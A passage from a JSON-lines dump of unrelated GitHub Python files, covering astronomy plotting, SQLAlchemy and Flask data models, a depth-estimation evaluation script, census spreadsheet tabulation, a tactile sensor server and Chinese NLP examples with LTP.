fontdict={'fontsize': 12})\n\n if(is_range):\n mean = np.mean(bins[i].data.v_phi)\n median = np.median(bins[i].data.v_phi)\n if plot_MU: MLE_MU = bins[i].MLE_mu\n\n ax.hist(bins[i].data.v_phi, \n bins=n_bins, \n range = (mean-150, mean+150), \n edgecolor='black',\n density = True)\n\n ax.axvline(x=mean, ls=\"--\", label=\"Mean\", color='r')\n ax.axvline(x=median, ls=\"--\", 
label=\"Median\", color='orange')\n if plot_MU: ax.axvline(x=bins[i].MLE_mu, ls=\"--\", label=\"MLE\", color='white')\n ax.legend(loc=\"lower left\")\n\n ax.set_title(\"Bin No. {}\".format(i))\n\n else: \n ax.hist(bins[i].data.v_phi, \n bins=n_bins, \n edgecolor='black')\n \n ax.set_xlabel(\"$v_\\phi$ [km/s]\", fontdict={'fontsize': 15}, labelpad = 5) \n ax.set_ylabel(\"N\", fontdict={'fontsize': 15}, labelpad = 10, rotation=0)\n ax.yaxis.set_label_coords(-0.1, 1.0)\n\n \n else:\n fig.delaxes(ax)\n\n plt.tight_layout()\n\n fig_name = '/sample_velocity_distribution'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\ndef plot_variance_distribution(bins, parameter, outpath, is_save=True):\n\n if(len(bins) % np.sqrt(len(bins)) == 0):\n figs_x = round(np.sqrt(len(bins)))\n figs_y = figs_x\n else:\n figs_x = round(np.sqrt(len(bins)))\n figs_y = figs_x+1\n\n if(len(bins) > 5):\n figsize = 15\n else:\n figsize = 10\n\n fig, axs = plt.subplots(figs_y, figs_x, figsize = (figsize,figsize))\n\n for i, ax in enumerate(axs.flat):\n\n if(i < len(bins)):\n\n n_bins = 160\n\n z_range = bins[i].z_boundaries\n r_range = bins[i].r_boundaries\n\n text_string = \"$z \\in [{:.1f}, {:.1f}]$\\n$r \\in [{:.1f}, {:.1f}]$\".format(z_range[0], z_range[1], \n r_range[0], r_range[1])\n ax.text(0.75, 0.8,text_string, horizontalalignment='center',\n verticalalignment='center',\n transform = ax.transAxes, fontdict={'fontsize': 12})\n\n\n var_array = bins[i].data.sig_vphi\n \n mean = np.mean(var_array)\n median = np.median(var_array)\n\n ax.hist(var_array, \n bins=n_bins,\n edgecolor='black',\n density = True)\n\n ax.axvline(x=mean, ls=\"--\", label=\"Mean\", color='r')\n ax.axvline(x=median, ls=\"--\", label=\"Median\", color='orange')\n ax.legend(loc=\"lower right\")\n ax.set_xlim(0, 0.5*np.max(var_array))\n ax.set_yscale('log')\n ax.set_title(\"Bin No. 
{}\".format(i))\n\n sub_index = \"{\" + \"v_\\{}\".format(parameter[parameter.find('_')+1:]) + \"}\"\n if(parameter == 'v_r'):\n sub_index = \"{\" + \"v_r\" + \"}\"\n \n ax.set_xlabel('$\\sigma^2_{}$ [km/s]'.format(sub_index), fontdict={'fontsize': 15}, labelpad = 5)\n ax.set_ylabel(\"N\", fontdict={'fontsize': 15}, labelpad = 10, rotation=0)\n ax.yaxis.set_label_coords(-0.1, 1.0)\n \n else:\n fig.delaxes(ax)\n\n plt.tight_layout()\n\n\n fig_name = '/sample_velocity_variance_distribution'\n if(is_save):\n plt.savefig(outpath + fig_name +'.png', bbox_inches='tight', dpi=300, facecolor='white')\n\n","repo_name":"HEP-KBFI/gaia-tools","sub_path":"gaia_tools/data_plot.py","file_name":"data_plot.py","file_ext":"py","file_size_in_byte":26342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"11652574925","text":"from typing import List, Optional\n\nfrom sqlalchemy.orm import Session\nfrom injector import inject\n\nfrom domain.repository import IOrderItemRepository\nfrom domain.model import OrderItemDOM\nfrom infra.schema import PatchedOrderItem as OrderItem\nfrom .util import orm_to_dom, orm_list_to_dom_list\n\n\nclass OrderItemRepository(IOrderItemRepository):\n @inject\n def __init__(self, db: Session) -> None:\n self.db = db\n\n def find(self, order_item_id: str) -> Optional[OrderItemDOM]:\n orm_order_item = self.db.query(OrderItem).get(order_item_id)\n return orm_to_dom(OrderItemDOM, orm_order_item) if orm_order_item else None\n\n def save(self, order_item: OrderItemDOM) -> str:\n orm_order_item = OrderItem(**order_item.to_rdb_dict())\n try:\n self.db.add(orm_order_item)\n self.db.flush()\n except Exception as e:\n self.db.rollback()\n raise e\n\n self.db.commit()\n return orm_order_item.id\n\n def update(self, order_item: OrderItemDOM) -> None:\n try:\n orm_order_item = self.db.query(OrderItem).get(order_item.id)\n for k, v in order_item.dict().items():\n setattr(orm_order_item, k, v)\n self.db.flush()\n except Exception as e:\n self.db.rollback()\n raise e\n\n self.db.commit()\n\n def delete(self, order_item: OrderItemDOM) -> None:\n try:\n orm_order_item = self.db.query(OrderItem).get(order_item.id)\n self.db.delete(orm_order_item)\n self.db.flush()\n except Exception as e:\n self.db.rollback()\n raise e\n\n self.db.commit()\n\n def list(self) -> List[OrderItemDOM]:\n orm_order_items = self.db.query(OrderItem).all()\n return orm_list_to_dom_list(OrderItemDOM, orm_order_items)\n","repo_name":"sin392/sw-order","sub_path":"app/infra/repository/order_item.py","file_name":"order_item.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72610765520","text":"from flask_app import app\nfrom flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import render_template,request,redirect,session,flash, get_flashed_messages\nfrom flask import flash\nfrom flask_bcrypt import Bcrypt\nimport re\nfrom flask_app.models import director\n\n\nclass Movie:\n\n db = \"movies_db\"\n def __init__(self,data):\n self.id = data['id']\n self.title = data['title']\n self.release_date = data['release_date']\n self.director_id = data['director_id']\n self.director = None\n \n @classmethod\n def get_all(cls):\n query = \"SELECT * FROM movies JOIN directors ON directors.id = movies.director_id;\"\n result = connectToMySQL(cls.db).query_db(query)\n movies_list =[]\n for row in result:\n #create the movie object\n movie_ob = cls(row)\n #create the 
director object\n director_data ={\n 'id':row['directors.id'],\n 'first_name': row['first_name'],\n 'last_name': row['last_name']\n }\n director_ob = director.Director(director_data)\n #associate the two objects together\n movie_ob.director = director_ob\n movies_list.append(movie_ob)\n return movies_list\n\n @classmethod\n def create(cls,data):\n query = \"INSERT INTO movies (title, release_date,director_id ) VALUES (%(title)s, %(release_date)s, %(director_id)s);\"\n result = connectToMySQL(cls.db).query_db(query,data)\n return result","repo_name":"ChewChuenChan/deploy_movies_proj","sub_path":"flask_app/models/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71810603921","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport _init_paths\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0,1,2,3\"\n\nimport torch\nimport torch.utils.data\nfrom opts import opts\nfrom model.model import create_model, load_model, save_model\nfrom model.data_parallel import DataParallel\nfrom logger import Logger\nfrom dataset.dataset_factory import get_dataset\nfrom trainer import Trainer\n\ndef get_optimizer(opt, model):\n optimizer = torch.optim.Adam(model.parameters(), opt.lr, weight_decay=opt.weight_decay)\n return optimizer\n\ndef main(opt):\n torch.manual_seed(opt.seed)\n torch.backends.cudnn.benchmark = not opt.not_cuda_benchmark and not opt.test\n Dataset = get_dataset(opt.dataset)\n opt = opts().update_dataset_info_and_set_heads(opt, Dataset)\n opt.eval_depth = True\n print(opt)\n if not opt.not_set_cuda_env:\n os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpus_str\n opt.device = torch.device('cuda' if opt.gpus[0] >= 0 else 'cpu')\n logger = Logger(opt)\n\n print('Creating model...')\n model = create_model(opt.arch, opt.heads, opt.head_conv, opt=opt)\n optimizer = get_optimizer(opt, model)\n start_epoch = 0\n if opt.load_model != '':\n model, optimizer, start_epoch = load_model(\n model, opt.load_model, opt, optimizer)\n\n trainer = Trainer(opt, model, optimizer)\n trainer.set_device(opt.gpus, opt.chunk_sizes, opt.device)\n\n print('Setting up validation data...')\n val_loader = torch.utils.data.DataLoader(\n Dataset(opt, 'val'), batch_size=1, shuffle=False, num_workers=1,\n pin_memory=True)\n\n if opt.test:\n _, preds = trainer.val(0, val_loader)\n val_loader.dataset.run_eval(preds, opt.save_dir)\n return\n\n print('Starting eval...')\n with torch.no_grad():\n log_dict_val, preds = trainer.val(1, val_loader)\n if opt.eval_val:\n val_loader.dataset.run_eval(preds, opt.save_dir)\n\n\nif __name__ == '__main__':\n opt = opts().parse()\n main(opt)\n","repo_name":"YoungSkKim/CenterNet-Boost","sub_path":"src/eval_depth.py","file_name":"eval_depth.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"33524055794","text":"# readCensusExcel.py - Tabulates population and number of census tracts\n# for each county.\n\nimport openpyxl\nimport docx\n\n# Read the spreadsheet data\nprint('Opening workbook...')\nwb = openpyxl.load_workbook('censuspopdata.xlsx')\nsheet = wb.get_sheet_by_name('Population by Census Tract')\n\ncountryData = {}\nstateData = {}\n\n# Fill in countyData with each county's population and tracts.\nprint('Reading rows...')\nfor row in range(2, sheet.max_row + 1):\n # Each row in the 
spreadsheet has data for one census tract.\n state = sheet['B' + str(row)].value\n county = sheet['C' + str(row)].value\n pop = sheet['D' + str(row)].value\n\n # Make sure the key for this state exists.\n countryData.setdefault(state, {})\n # Make sure the key for this county in this state exists.\n countryData[state].setdefault(county, {'tracts': 0, 'pop': 0})\n\n # Each row represents one census tract, so increment by one.\n countryData[state][county]['tracts'] += 1\n # Increase the county pop by the pop in this census tract.\n countryData[state][county]['pop'] += int(pop)\n\n\n stateData.setdefault(state, 0)\n stateData[state] += int(pop)\n\n\n# Open a new Word document and write the contents of stateData to it.\nprint('Writing results...')\ndoc = docx.Document()\n\ntable = doc.add_table(rows=1, cols=2)\ntable.style = 'Light Grid Accent 1'\n\n# Table head\nhdr_cells = table.rows[0].cells\nhdr_cells[0].text = 'State'\nhdr_cells[1].text = 'Population'\n\nfor stateName, statistic in stateData.items():\n row_cells = table.add_row().cells\n row_cells[0].text = stateName\n row_cells[1].text = str(statistic)\n\ndoc.save('PopulationStatistic.docx')\nprint('Done.')\n\n","repo_name":"Chandler-Song/Python_Awesome","sub_path":"Python_ABC/2-12excel/6excelWord.py","file_name":"6excelWord.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"23299812331","text":"import sys\nimport numpy as np\nimport scipy.interpolate as inter\nimport matplotlib.pyplot as plt\n\n\ndef curve(x):\n \"\"\"\n Cardelli 1989\n \"\"\"\n x = 10000./x\n y = x - 1.82\n \n a=np.polyval([0.32999, -0.77530, 0.01979, 0.72085, -0.02427, -0.50447, 0.17699, 1.], y)\n b=np.polyval([-2.09002, 5.30260, -0.62251, -5.38434, 1.07233, 2.28305, 1.41338, 0.], y)\n \n R=3.1\n return a+b/R\n\ndef extinction(field, input, output):\n\n# original sensitivity function\n wave0 = np.genfromtxt(input, comments='#')[:,0]\n factor0 = np.genfromtxt(input, comments='#')[:,1]\n factor0_err = np.genfromtxt(input, comments='#')[:, 2]\n\n if(field=='GOODSS'):\n Av=0.019\n if(field=='UDS'):\n Av=0.061\n if(field=='COSMOS'):\n Av=0.051\n\n# A_lambda\n A_lambda = curve(wave0)*Av\n\n# corrected sensitivity function\n factor=factor0*10**(0.4*A_lambda)\n factor_err = factor0_err*10**(0.4*A_lambda)\n\n# f=plt.figure()\n# plt.plot(wave0, factor0, label='Original curve')\n# plt.plot(wave0, factor, label='Extinction corrected curve')\n# plt.plot(wave0, factor/factor0)\n# plt.xlabel('Wavelength [Angstroms]')\n# plt.ylabel('(ergs/s/cm2/A)/(e/s/pix)')\n# plt.legend()\n# plt.show()\n\n lun = open(output, 'w')\n lun.write('# Flux calibration Curve'+'\\n')\n lun.write('# Angstroms (erg/s/cm2/A)/(e/s/pix)'+'\\n')\n output_data = np.vstack((wave0, factor, factor_err)).T\n np.savetxt(lun, output_data)\n lun.close()","repo_name":"aguilerav/m2fs_reduction","sub_path":"m2fs_pipeline/extinction.py","file_name":"extinction.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}{"seq_id":"24504633652","text":"from serial.tools.list_ports import comports\nimport argparse\nfrom datetime import datetime\n\nfrom multiprocessing import Process # process\nfrom multiprocessing import Array # shared memory\nfrom multiprocessing import Value # shared memory\nfrom multiprocessing import Pipe # inter-process communication pipe\n\nimport traceback\n\nfrom matsense.serverkit import Proc, Userver, FLAG\nfrom matsense.datasetter import (\n\tDataSetterSerial, 
DataSetterDebug, DataSetterFile\n)\nfrom matsense.exception import CustomException\nfrom matsense.tools import (\n\tload_config, blank_config, check_config, print_sensor, \n make_action, DEST_SUFFIX\n)\nfrom matsense.filemanager import clear_file\n\n\nN = 16 # sensor side length\nBAUDRATE = 500000\nTIMEOUT = 1 # in seconds\ndevices_found = comports()\nPORT = None\ntry:\n\t## default use the last port on the list\n\tPORT = devices_found[-1].device\nexcept:\n\tpass\n\nUDP = False\nNO_CONVERT = False\n\nZLIM = 3\nFPS = 100\n\nDEBUG = False\nOUTPUT_FILENAME_TEMPLATE = \"processed_%Y%m%d%H%M%S.csv\"\nOUTPUT_FILENAME = datetime.now().strftime(OUTPUT_FILENAME_TEMPLATE)\n\nINTERMEDIATE = 0\n\n\ndef enumerate_ports():\n\t# 查看可用端口\n\tprint(\"All serial ports:\")\n\tfor item in devices_found:\n\t\tprint(item)\n\ndef task_serial(paras):\n\tret = None\n\ttry:\n\t\tif paras['config']['server_mode']['debug']:\n\t\t\tmy_setter = DataSetterDebug()\n\t\telse:\n\t\t\tmy_setter = DataSetterSerial(\n\t\t\t\tparas['config']['sensor']['total'], \n\t\t\t\tparas['config']['serial']['baudrate'], \n\t\t\t\tparas['config']['serial']['port'], \n\t\t\t\tparas['config']['serial']['timeout'],\n\t\t\t\timu=paras['config']['serial']['imu'],\n\t\t\t\tprotocol=paras['config']['serial']['protocol'],\n\t\t\t)\n\t\tmy_proc = Proc(\n\t\t\tparas['config']['sensor']['shape'], \n\t\t\tmy_setter, \n\t\t\tparas['data_out'], \n\t\t\tparas['data_raw'], \n\t\t\tparas['data_imu'], \n\t\t\tparas['idx_out'],\n\t\t\traw=paras['config']['process']['raw'],\n\t\t\twarm_up=paras['config']['process']['warm_up'],\n\t\t\tV0=paras['config']['process']['V0'],\n\t\t\tR0_RECI=paras['config']['process']['R0_RECI'],\n\t\t\tconvert=paras['config']['process']['convert'],\n\t\t\tmask=paras['config']['sensor']['mask'],\n\t\t\tfilter_spatial=paras['config']['process']['filter_spatial'],\n\t\t\tfilter_spatial_cutoff=paras['config']['process']['filter_spatial_cutoff'],\n\t\t\tbutterworth_order=paras['config']['process']['butterworth_order'],\n\t\t\tfilter_temporal=paras['config']['process']['filter_temporal'],\n\t\t\tfilter_temporal_size=paras['config']['process']['filter_temporal_size'],\n\t\t\trw_cutoff=paras['config']['process']['rw_cutoff'],\n\t\t\tcali_frames=paras['config']['process']['cali_frames'],\n\t\t\tcali_win_size=paras['config']['process']['cali_win_size'],\n\t\t\tpipe_conn=paras['pipe_proc'],\n\t\t\tcopy_tags=False,\n\t\t\timu=paras['config']['serial']['imu'],\n\t\t\tintermediate=paras['config']['process']['intermediate']\n\t\t)\n\t\tret = my_proc.run()\n\texcept KeyboardInterrupt:\n\t\tpass\n\texcept CustomException as e:\n\t\tprint(e)\n\texcept BaseException as e:\n\t\ttraceback.print_exc()\n\t\t# print(e)\n\tfinally:\n\t\t## close the other process\n\t\tparas['pipe_proc'].send((FLAG.FLAG_STOP,))\n\tprint(\"Processing stopped.\")\n\treturn ret\n\ndef task_server(paras):\n\ttry:\n\t\twith Userver(\n\t\t\tparas['data_out'], \n\t\t\tparas['data_raw'], \n\t\t\tparas['data_imu'], \n\t\t\tparas['idx_out'], \n\t\t\tparas['config']['connection']['server_address'], \n\t\t\ttotal=paras['config']['sensor']['total'],\n\t\t\tudp=paras['config']['connection']['udp'],\n\t\t\tpipe_conn=paras['pipe_server'],\n\t\t\tconfig_copy=paras['config'],\n\t\t) as my_server:\n\t\t\tmy_server.run_service()\n\texcept KeyboardInterrupt:\n\t\tpass\n\texcept CustomException as e:\n\t\tprint(e)\n\texcept BaseException as e:\n\t\ttraceback.print_exc()\n\t\t# print(e)\n\tfinally:\n\t\t## close the other process\n\t\tparas['pipe_server'].send((FLAG.FLAG_STOP,))\n\ndef 
task_file(paras):\n\tprint(f\"Processed data saved to: {paras['config']['data']['out_filename']}\")\n\tmy_setter = DataSetterFile(\n\t\tparas['config']['sensor']['total'], \n\t\tparas['config']['data']['in_filenames'], \n\t)\n\tmy_proc = Proc(\n\t\tparas['config']['sensor']['shape'], \n\t\tmy_setter, \n\t\tparas['data_out'], \n\t\tparas['data_raw'], \n\t\tparas['idx_out'],\n\t\traw=False,\n\t\twarm_up=0,\n\t\tV0=paras['config']['process']['V0'],\n\t\tR0_RECI=paras['config']['process']['R0_RECI'],\n\t\tconvert=paras['config']['process']['convert'],\n\t\tmask=paras['config']['sensor']['mask'],\n\t\tfilter_spatial=paras['config']['process']['filter_spatial'],\n\t\tfilter_spatial_cutoff=paras['config']['process']['filter_spatial_cutoff'],\n\t\tbutterworth_order=paras['config']['process']['butterworth_order'],\n\t\tfilter_temporal=paras['config']['process']['filter_temporal'],\n\t\tfilter_temporal_size=paras['config']['process']['filter_temporal_size'],\n\t\trw_cutoff=paras['config']['process']['rw_cutoff'],\n\t\tcali_frames=paras['config']['process']['cali_frames'],\n\t\tcali_win_size=paras['config']['process']['cali_win_size'],\n\t\tpipe_conn=None,\n\t\toutput_filename=paras['config']['data']['out_filename'],\n\t\tcopy_tags=True,\n\t)\n\t## clear file content\n\tclear_file(paras['config']['data']['out_filename'])\n\tmy_proc.run()\n\ndef prepare_config(args):\n\t## load config and combine commandline arguments\n\tif args.config:\n\t\tconfig = load_config(args.config)\n\telse:\n\t\tconfig = blank_config()\n\t## priority: commandline arguments > config file > program defaults\n\tif config['sensor']['shape'] is None or hasattr(args, 'n'+DEST_SUFFIX):\n\t\tconfig['sensor']['shape'] = args.n\n\tif config['serial']['baudrate'] is None or hasattr(args, 'baudrate'+DEST_SUFFIX):\n\t\tconfig['serial']['baudrate'] = args.baudrate\n\tif config['serial']['timeout'] is None or hasattr(args, 'timeout'+DEST_SUFFIX):\n\t\tconfig['serial']['timeout'] = args.timeout\n\tif config['serial']['port'] is None or hasattr(args, 'port'+DEST_SUFFIX):\n\t\tconfig['serial']['port'] = args.port\n\tif config['connection']['udp'] is None or hasattr(args, 'udp'+DEST_SUFFIX):\n\t\tconfig['connection']['udp'] = args.udp\n\tif config['connection']['server_address'] is None or hasattr(args, 'address'+DEST_SUFFIX):\n\t\tconfig['connection']['server_address'] = args.address\n\tif config['process']['convert'] is None or hasattr(args, 'no_convert'+DEST_SUFFIX):\n\t\tconfig['process']['convert'] = not args.no_convert\n\tif config['visual']['zlim'] is None or hasattr(args, 'zlim'+DEST_SUFFIX):\n\t\tconfig['visual']['zlim'] = args.zlim\n\tif config['visual']['fps'] is None or hasattr(args, 'fps'+DEST_SUFFIX):\n\t\tconfig['visual']['fps'] = args.fps\n\tif config['visual']['pyqtgraph'] is None or hasattr(args, 'pyqtgraph'+DEST_SUFFIX):\n\t\tconfig['visual']['pyqtgraph'] = args.pyqtgraph\n\tif config['visual']['scatter'] is None or hasattr(args, 'scatter'+DEST_SUFFIX):\n\t\tconfig['visual']['scatter'] = args.scatter\n\tif config['server_mode']['service'] is None or hasattr(args, 'noservice'+DEST_SUFFIX):\n\t\tconfig['server_mode']['service'] = not args.noservice\n\tif config['process']['raw'] is None or hasattr(args, 'raw'+DEST_SUFFIX):\n\t\tconfig['process']['raw'] = args.raw\n\tif config['server_mode']['visualize'] is None or hasattr(args, 'visualize'+DEST_SUFFIX):\n\t\tconfig['server_mode']['visualize'] = args.visualize\n\tif config['server_mode']['enumerate'] is None or hasattr(args, 
'enumerate'+DEST_SUFFIX):\n\t\tconfig['server_mode']['enumerate'] = args.enumerate\n\tif config['server_mode']['debug'] is None or hasattr(args, 'debug'+DEST_SUFFIX):\n\t\tconfig['server_mode']['debug'] = args.debug\n\tif config['data']['out_filename'] is None or hasattr(args, 'output'+DEST_SUFFIX):\n\t\tconfig['data']['out_filename'] = args.output\n\tif config['server_mode']['use_file'] is None:\n\t\tconfig['server_mode']['use_file'] = False\n\tif config['serial']['imu'] is None or hasattr(args, 'imu'+DEST_SUFFIX):\n\t\tconfig['serial']['imu'] = args.imu\n\tif config['process']['intermediate'] is None or hasattr(args, 'intermediate'+DEST_SUFFIX):\n\t\tconfig['process']['intermediate'] = args.intermediate\n\n\t## some modifications\n\tif args.filenames:\n\t\tconfig['server_mode']['use_file'] = True\n\t\tconfig['data']['in_filenames'] = args.filenames\n\n\tcheck_config(config)\n\treturn config\n\ndef run(config):\n\tret = None\n\n\t## enumerate serial ports\n\tif config['server_mode']['enumerate']:\n\t\tenumerate_ports()\n\t\treturn\n\n\tprint_sensor(config)\n\n\t## shared variables\n\t## output data array\n\tdata_out = Array('d', config['sensor']['total']) # d for double\n\t## raw data array\n\tdata_raw = Array('d', config['sensor']['total']) # d for double\n\t## imu data array\n\tdata_imu = Array('d', 6) # d for double\n\t## frame index\n\tidx_out = Value('i') # i for signed int\n\t## Proc-Userver communication pipe\n\tpipe_proc, pipe_server = Pipe(duplex=True)\n\n\t## function parameters\n\tparas = {\n\t\t\"config\": config,\n\t\t\"data_out\": data_out,\n\t\t\"data_raw\": data_raw,\n\t\t\"data_imu\": data_imu,\n\t\t\"idx_out\": idx_out,\n\t\t\"pipe_proc\": pipe_proc,\n\t\t\"pipe_server\": pipe_server,\n\t}\n\n\tif config['server_mode']['use_file']:\n\t\ttask_file(paras)\n\t\treturn\n\n\tif config['server_mode']['visualize']:\n\t\tp = Process(target=task_serial, args=(paras,))\n\t\tp.start()\n\n\t\tif not config['visual']['pyqtgraph']:\n\t\t\tfrom matsense.visual.player_matplot import Player3DMatplot as Player\n\t\t\tprint(\"Activate visualization using matplotlib\")\n\t\telse:\n\t\t\tfrom matsense.visual.player_pyqtgraph import Player3DPyqtgraph as Player\n\t\t\tprint(\"Activate visualization using pyqtgraph\")\n\t\t## visualization must be in main process\n\t\tfrom matsense.visual import gen_reshape\n\t\tmy_player = Player(\n\t\t\tzlim=config['visual']['zlim'], \n\t\t\tN=config['sensor']['shape'],\n\t\t\tscatter=config['visual']['scatter']\n\t\t)\n\t\tmy_player.run_stream(\n\t\t\tgenerator=gen_reshape(data_out, config['sensor']['shape']), \n\t\t\tfps=config['visual']['fps']\n\t\t)\n\n\t\tp.join()\n\telse:\n\t\tif config['server_mode']['service']:\n\t\t\tp_server = Process(target=task_server, args=(paras,))\n\t\t\tp_server.start()\n\n\t\tret = task_serial(paras)\n\n\t\tif config['server_mode']['service']:\n\t\t\tp_server.join()\n\t\n\tdel data_out\n\tdel data_raw\n\tdel data_imu\n\tdel idx_out\n\tdel pipe_proc, pipe_server\n\n\treturn ret\n\n\ndef main():\n\tparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\tparser.add_argument('-e', dest='enumerate', action=make_action('store_true'), default=False, help=\"enumerate all serial ports\")\n\tparser.add_argument('-p', dest='port', action=make_action('store'), default=PORT, help=\"specify serial port\")\n\tparser.add_argument('-b', dest='baudrate', action=make_action('store'), default=BAUDRATE, type=int, help=\"specify baudrate\")\n\tparser.add_argument('-t', dest='timeout', 
action=make_action('store'), default=TIMEOUT, type=float, help=\"specify timeout in seconds\")\n\tparser.add_argument('-n', dest='n', action=make_action('store'), default=[N], type=int, nargs='+', help=\"specify sensor shape\")\n\tparser.add_argument('--noservice', dest='noservice', action=make_action('store_true'), default=False, help=\"do not run service (only serial data receiving & processing)\")\n\tparser.add_argument('-a', '--address', dest='address', action=make_action('store'), help=\"specify server socket address\")\n\tparser.add_argument('-u', '--udp', dest='udp', action=make_action('store_true'), default=UDP, help=\"use UDP protocol\")\n\tparser.add_argument('-r', '--raw', dest='raw', action=make_action('store_true'), default=False, help=\"raw data mode\")\n\tparser.add_argument('-nc', '--no_convert', dest='no_convert', action=make_action('store_true'), default=NO_CONVERT, help=\"do not apply voltage-resistance conversion\")\n\tparser.add_argument('-v', '--visualize', dest='visualize', action=make_action('store_true'), default=False, help=\"enable visualization\")\n\tparser.add_argument('-z', '--zlim', dest='zlim', action=make_action('store'), default=ZLIM, type=float, help=\"z-axis limit\")\n\tparser.add_argument('-f', dest='fps', action=make_action('store'), default=FPS, type=int, help=\"frames per second\")\n\tparser.add_argument('--scatter', dest='scatter', action=make_action('store_true'), default=False, help=\"show scatter plot\")\n\tparser.add_argument('--pyqtgraph', dest='pyqtgraph', action=make_action('store_true'), default=False, help=\"use pyqtgraph to plot\")\n\t# parser.add_argument('-m', '--matplot', dest='matplot', action=make_action('store_true'), default=False, help=\"use matplotlib to plot\")\n\tparser.add_argument('--config', dest='config', action=make_action('store'), default=None, help=\"specify configuration file\")\n\tparser.add_argument('-d', '--debug', dest='debug', action=make_action('store_true'), default=DEBUG, help=\"debug mode\")\n\n\tparser.add_argument('filenames', nargs='*', action='store', help=\"use file(s) as data source instead of serial port\")\n\tparser.add_argument('-o', dest='output', action=make_action('store'), default=OUTPUT_FILENAME, help=\"output processed data to file\")\n\n\tparser.add_argument('-i', '--imu', dest='imu', action=make_action('store_true'), default=False, help=\"support IMU\")\n\n\tparser.add_argument('--intermediate', dest='intermediate', action=make_action('store'), default=INTERMEDIATE, type=int, help=\"specify intermediate result\")\n\n\targs = parser.parse_args()\n\tconfig = prepare_config(args)\n\n\twhile True:\n\t\t## run according to config\n\t\tret = run(config)\n\n\t\tif ret != None:\n\t\t\tif ret[0] == 1: ## restart\n\t\t\t\tconfig = ret[1]\n\t\t\t\tcontinue\n\n\t\t## exit program\n\t\tbreak\n\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"atomiechen/MatSense","sub_path":"matsense/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12987,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"32571354466","text":"import os\nimport pyltp\n\n# 模型的路径\nLTP_DATA_DIR = r'D:\\work\\data_collectors\\ltp_data'\n# 分词模型\ncws_model_path = os.path.join(LTP_DATA_DIR, 'cws.model')\n# 词性标注模型\npos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model')\n# 实体识别模型\nner_model_path = os.path.join(LTP_DATA_DIR, 'ner.model')\n# 依存句法分析模型#\npar_model_path = os.path.join(LTP_DATA_DIR, 'parser.model')\n\ndef test_first():\n LTP_DATA_DIR = 
r'D:\\work\\data_collectors\\ltp_data'\n pos_model_path = os.path.join(LTP_DATA_DIR, 'pos.model') # 词性标注模型路径,模型名称为`pos.model`\n\n from pyltp import Postagger\n postagger = Postagger() # 初始化实例\n postagger.load(pos_model_path) # 加载模型\n\n words = ['欧几里得', '是', '西元前', '三', '世纪', '的', '希腊', '数学家', '。']\n postags = postagger.postag(words) # 词性标注\n\n print(' '.join(postags))\n postagger.release() # 释放模型\n\n\n# 基于LTP的分词\ndef word_segmentation(sentence):\n cws_ = pyltp.Segmentor()\n cws_.load(cws_model_path)\n words = cws_.segment(sentence)\n print('\\t'.join(words))\n cws_.release()\n return words\n\n\n# 基于LTP的词性标注\ndef word_posttagger(sentence):\n pos_ = pyltp.Postagger()\n pos_.load(pos_model_path)\n result = pos_.postag(sentence)\n print(type(result))\n print('\\t'.join(result))\n pos_.release()\n return result\n\n\n# 基于LTP的实体识别\ndef word_ner(words, pos_tags):\n ner_ = pyltp.NamedEntityRecognizer()\n ner_.load(ner_model_path)\n name_entity = ner_.recognize(words, pos_tags)\n print('\\t'.join(name_entity))\n ner_.release()\n return name_entity\n\n\n# 基于LTP的依存句法分析#\ndef word_par(words, pos_tags):\n par_ = pyltp.Parser()\n par_.load(par_model_path)\n arcs = par_.parse(words, pos_tags)\n print('\\t'.join('%d:%s' % (arc.head, arc.relation) for arc in arcs))\n par_.release()\n return arcs\n\n\nif __name__ == '__main__':\n word_parse = word_segmentation('国务院总理李克强调研上海外高桥时提出,支持上海积极探索新机制。')\n word_property_list = word_posttagger(word_parse)\n for item in zip(word_parse, word_property_list):\n print(item)\n word_ner(word_parse, word_property_list)\n word_par(word_parse, word_property_list)\n\n\n\n\n","repo_name":"ReigenDing/free_coding","sub_path":"自然语言处理/ltp.py","file_name":"ltp.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73355300561","text":"from refs import END_OPT_C, OPT_C\nfrom text.screens.screen_names import BACK, INTRO_DOMAIN_GENDER\n\n\ndef get_screen(console, screen_data):\n display_text = f'\\n\\tOh almighty Deity, please bless us with your name.\\n'\n display_text += f'\\n\\t{OPT_C}0:{END_OPT_C} Cancel\\n'\n _options = {'0': BACK}\n return display_text, _options\n\n\ndef handle_action(console, action):\n console.new_game_info['name'] = action\n console.set_screen(INTRO_DOMAIN_GENDER, True)\n","repo_name":"eman1can/CoatiraneAdventures","sub_path":"src/text/screens/new_game/intro_domain_name.py","file_name":"intro_domain_name.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15187399103","text":"import time\nfrom tqdm import tqdm \nimport itertools as itr\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport traceback\nfrom 